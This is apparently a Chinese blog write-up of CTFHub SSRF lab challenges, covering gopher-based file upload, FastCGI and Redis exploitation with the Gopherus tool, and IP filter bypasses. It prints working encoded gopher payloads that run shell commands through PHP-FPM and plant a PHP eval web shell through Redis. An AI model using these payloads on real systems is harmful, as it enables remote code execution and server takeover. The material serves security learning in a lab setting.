SSRF学习 2

已于 2023-03-02 17:48:23 修改
阅读量841 收藏
点赞数
分类专栏: SSRF CTFHub技能树 文章标签: web安全
于 2022-05-21 14:41:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/124806630
版权

目录

[CTFHub]

1. 上传文件

分割线

2. FastCGI协议(gopherus工具)

3. Redis协议

Bypass

 (1) URL Bypass

(2) 数字IP Bypass

 (3) 302跳转 Bypass

(4) DNS重绑定 Bypass

[CTFHub]

1. 上传文件

这道题和上个发post请求差不,都是用到了gopher协议,http请求包两次编码,打入gopher。不过这道题有点特别:

上传文件却没有提交按钮??? 怎么上传呢? 这就需要一点点html的知识了,我们知道,前端是可以更改的,所以一会我们上传的时候插入一段html代码即可。

开始做题,首先用file://协议试着读取一下文件代码。

?url=file:///var/www/html/flag.php

?url=file:///var/www/html/index.php 查看一下flag.php和index.php文件

#flag.php文件
<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

#index.php文件
<?php

error_reporting(0);

if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

代码审计可知,在flag.php文件中,要在本地环境127.0.0.1条件下访问,利用POST/flag.php上传一个文件,上传成功后getenv()会输出环境变量CTFHUB的值,里面应该就是flag了。

所以后面我们试着上传一个文件,burp抓包,这就绕回前面说的,如何添加提交按钮啦:

在此处把下标签插入html中:

< input="submit" name="button">

  提交就出现啦。

 之后随便上传一个文件burp抓包。

将抓取的包的Host变成127.0.0.1:80。之后再对消息头报文二次URL编码,URL第一次编码后要把%0A替换为%0D%0A,再进行第二次编码(这些SSRF1里已经说过了)

POST /flag.php HTTP/1.1

Host: 127.0.0.1:80

Content-Length: 343

Content-Type: multipart/form-data; boundary=---------------------------102674569428728092931880983979

-----------------------------102674569428728092931880983979
Content-Disposition: form-data; name="file"; filename="123.jpg"
Content-Type: image/jpeg


-----------------------------102674569428728092931880983979
Content-Disposition: form-data; name="button"

提交查询
-----------------------------102674569428728092931880983979--

之后将构造好的打入gopher协议中(格式:gopher://127.0.0.1:80/_  )

这里直接写出两次编码后的payload: 

POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%3A80%0D%0AContent-Type%3A%20multipart%2Fform-data%3B%20boundary%3D---------------------------102674569428728092931880983979%0D%0AContent-Length%3A%20343%0D%0A%0D%0A-----------------------------102674569428728092931880983979%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22file%22%3B%20filename%3D%22123.jpg%22%0D%0AContent-Type%3A%20image%2Fjpeg%0D%0A%0D%0A12345%0D%0A-----------------------------102674569428728092931880983979%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22button%22%0D%0A%0D%0A%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2%0D%0A-----------------------------102674569428728092931880983979--%0D%0A

 得到flag。

鼓捣了半天没有得到flag。我觉得是因为我上传了一个空文件,后面往文件里写入一些内容后就得到了flag。这方面确实挺让人心烦的,希望大家学习过程中能戒骄戒躁,思考全面。

分割线

到了这里之后,SSRF题目难度已经不是我这种小白见识过的了,不得不看各方大佬们的题解。在此也是记录一下,学习一下大佬们的思路。

2. FastCGI协议(gopherus工具)

下载地址:Gopherus

题目附件:Fastcgi协议分析 

gopherus工具打FastCGI

这种题一般情况下就是利用gopherus直接生成gopher数据把payload打入即可,其他方法少

python2 gopherus.py --exploit fastcgi    第一次输入 
/var/www/html/index.php                 再输入 //这个是已知存在的php文件 
ls /                                     第三次输入 ls命令

报错:Missing parentheses in call to 'print'. Did you mean print(...)?

注意要用python2

 urlencode进行一下编码。

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH56%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%25008%2504%2500%253C%253Fphp%2520system%2528%2527ls%2520%2F%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

发现了flag文件。再利用gopherus工具打入一下 cat /flag_4c50ebdc66ce83adcdb05f434cc5b491

urlencode进行一下编码。

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2504%2504%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH94%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%255E%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Fflag_4c50ebdc66ce83adcdb05f434cc5b491%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

3. Redis协议

一样是运用gopherus协议。

Redis服务器与客户端通过RESP(REdis Serialization Protocol)协议通信。
RESP协议是在Redis 1.2中引入的,但它成为了与Redis 2.0中的Redis服务器通信的标准方式。这是您应该在Redis客户端中实现的协议。
RESP实际上是一个支持以下数据类型的序列化协议:简单字符串,错误,整数,批量字符串和数组

利用gopherus工具来生成payload:

python2 gopherus.py --exploit redis

第一个选项这里我们填写php,因为我们需要的是phpshell

第二个选项可以不填,默认根路径为/var/www/html

第三个就写入我们的shell代码

 这里我们再进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了

对生成的payload url编码

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252433%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

 显示这个504,表明已经成功上传shell,

 蚁剑链接即可。

 在根目录下找到flag。

Bypass

 (1) URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com

可以用@来绕过。

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

@表示如果这个被执行,就扔掉前面了,相当于访问后面的

具体可以看这个师傅的文字:传送门

(2) 数字IP Bypass

hacker! Ban '/127|172|@/'

127 172 @都被过滤了。绕过数字ip过滤。可以采用八进制、十六进制

也可以特殊的 0.0.0.0绕过

上一章SSRF学习 1 有提到这些绕过姿势。

 (3) 302跳转 Bypass

 直接访问127.0.0.1/flag.php 是被ban掉的.

用file协议读取一下源码试试:

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])) {
    header("Location: /?url=_");
    exit;
}

$url = $_REQUEST['url'];

if (preg_match("/127|172|10|192/", $url)) {
    exit("hacker! Ban Intranet IP");
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

172 127  10  192被ban掉了。和上一题一样,可以0.0.0.0绕过。

?url=0.0.0.0/flag.php

?url=2130706433/flag.php  十进制绕过。

得到flag。

(4) DNS重绑定 Bypass

关键词:DNS重绑定

题目附件:浅谈DNS重绑定漏洞 - 知乎

之前没有见到过。

看其他师傅题解后可知:

当我们给出一个网址链接时,首先会使用服务器端的dns服务器进行dns解析,解析出ip后,再与黑名单比对,进行过滤或请求。
这是使用的原理是,让一个网址绑定两个ip,或者也可以理解为快速的更换绑定对象。
进行dns解析时会随机返回一个ip

 把下面的放到url里。

葫芦娃42
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gopherus-开源
04-13
Gopherus是一个免费的,多平台,控制台模式的gopher客户端,可用于DOS,Linux和Windows。 它为gopherspace提供了经典的文本界面。 虽然主要针对DOS,但也可以使用Windows和Linux的端口。 它们使用SDL2模拟伪终端。
SSRF中Redis的利用
hackzkaq的博客
01-26 1088
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
最新发布
qq_75120258的博客
03-29 1324
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
探索Gopherus:Go语言的高效静态代码分析工具
gitblog_00019的博客
03-23 388
探索Gopherus:Go语言的高效静态代码分析工具 项目地址:https://gitcode.com/tarunkant/Gopherus 项目简介 Gopherus是一个开源的、由Go语言编写的静态代码分析工具,旨在帮助开发者发现并修复Go代码中的潜在问题和不规范之处。该项目的目标是提高代码质量,提升开发效率,并且促进团队之间的编码一致性。 技术分析 Gopherus的核心是基于Go语言的抽象...
CTFHub ssfr FastCgi协议 & Redis 协议
m0_62879498的博客
02-18 1807
ctfhub ssfr FastCgi & Redis 协议 FastCgi协议 这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助 首先我们要先了解这个协议内容(具体查看ctfhub里面的文章) 在本关我们可以尝试使用linux解决问题(**需要下载python2版本!!!,否则Gopherus无法读取 **并且下载Gopherus脚本) linux python2下载方法: [参考博客]((1条消息) 完美解决 Linux安装python2.7 方案_你懂了我的冬天的博客
ctf web方向与php学习记录24(SSRF续)
这周末在做梦的博客
11-07 685
一,FastCGI协议 根据附件提示,只要找到9000端口并监听,然后构造可执行任意代码的playload上传即可。这里推荐一款神器Gopherus,安装简单,装在kali里就可以了。 工具会对playload进行两次url转码,为了绕过网址访问时进行的url解码,故必须再次对工具构造的playload进行url编码。 1工具的使用 首先,输入python gopherus.py --exploit fastcgi明确攻击协议,然后构造访问用的playload。工具提示先设置可访问的网页文件地址,然后加载命
Gopherus-master.zip
11-13
好用的gopher协议工具,两种模式(反弹shell&phpshell),可以自动生成payload,使用payload时请注意再次进行url编码
SSRF详解 基于CTFHub(下篇)
Bossfrank的博客
04-28 1089
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 4752
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
ctf刷题记录
enhengzZ的博客
04-23 1347
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
【技术分享】SSRF漏洞学习 .pdf
09-05
【技术分享】SSRF漏洞学习 安全测试 大数据 信息安全研究 安全对抗 企业安全
乌云峰会猪猪侠ppt-关于SSRF
03-26
该资源是猪猪侠在2016年乌云峰会上发表演讲的PPT(已被转成PDF),内容是关于SSRF漏洞,我之前找这个找了很久,在这里分享出来,供大家参考学习,共同进步。
国光师傅的SSRF靶场docker环境.zip
01-16
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-16
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
SSRF利用协议中的万金油——Gopher
qq_57172130的博客
08-07 7049
使用gopher协议进一步利用ssrf
漏洞原理——ssrf
热门推荐
nobugnomoney的博客
04-04 2万+
一、什么是SSRF 1、简单了解 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。 攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 642
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
bestphp‘s revenge 1
m0_62129839的博客
02-20 161
因为$b变量已经被我们覆盖成了call_user_func,那么此时的程序,就变成了call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));9. $_session这个对象,会去调用“welcome_to_the_lctf2018”这个不存在的方法,于是__call方法被。
学习ssrf相关的知识体系
04-27
好的,关于学习SSRF(Server-Side Request Forgery)相关的知识体系,我可以给你一些建议: 1. 理解SSRF的概念和原理:SSRF是指攻击者利用服务器端应用程序的漏洞,构造恶意请求,从而在未经授权的情况下访问和攻击内部系统。要深入了解SSRF,首先需要理解它的概念和原理。 2. 学习SSRF的攻击方式和技术:攻击者可以利用SSRF漏洞进行多种攻击,如访问内部系统、执行任意命令等。学习SSRF的攻击方式和技术可以帮助你更好地理解和应对SSRF攻击。 3. 掌握SSRF的检测和修复方法:要有效地防御SSRF攻击,需要掌握SSRF的检测和修复方法。这包括对应用程序的漏洞扫描、安全配置和代码审计等方面的掌握。 4. 学习SSRF相关的工具和框架:有很多工具和框架可以帮助你发现和修复SSRF漏洞,如Burp Suite、OWASP ZAP、Netsparker等。学习和熟练使用这些工具和框架可以提高你的SSRF漏洞检测和修复能力。 希望这些建议可以帮助你更好地学习SSRF相关的知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值